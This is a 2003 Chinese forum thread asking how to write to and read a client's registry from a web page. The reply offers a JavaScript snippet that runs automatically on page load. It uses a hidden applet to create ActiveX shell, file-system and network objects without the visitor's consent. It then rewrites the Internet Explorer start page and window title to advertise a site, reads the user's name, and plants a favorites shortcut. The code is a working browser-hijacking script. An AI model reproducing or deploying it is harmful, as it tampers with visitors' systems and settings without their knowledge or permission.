如何向客戶端的注冊表寫信息,又如何從客戶端的注冊表獲得信息

KK4 2003-10-22 03:15:02
如題
...全文
29 1 打赏 收藏 转发到动态 举报
写回复
用AI写文章
1 条回复
切换为时间正序
请发表友善的回复…
发表回复
pp4u 2003-10-23
  • 打赏
  • 举报
回复
JavaScript修改注册表的例子
--------------------------------------------------------------------------------



document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
//ActiveX 初始化
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (document.cookie.indexOf("Chg") == -1)
{
//设置Cookie
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//设置Cookie完毕

//设置主页
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.51js.com/");
//修改浏览器的标题
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "你的Internet Explorer已经被修改过了 51JS.COM");
//设置Cookie
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"


var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}

AddFavLnk(loc, "无忧脚本", "http://www.51js.com");


}
}
catch(e)
{}
}
catch(e)
{}
}

function init()
{
setTimeout("f()", 1000);
}

init();

</script>

62,041

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧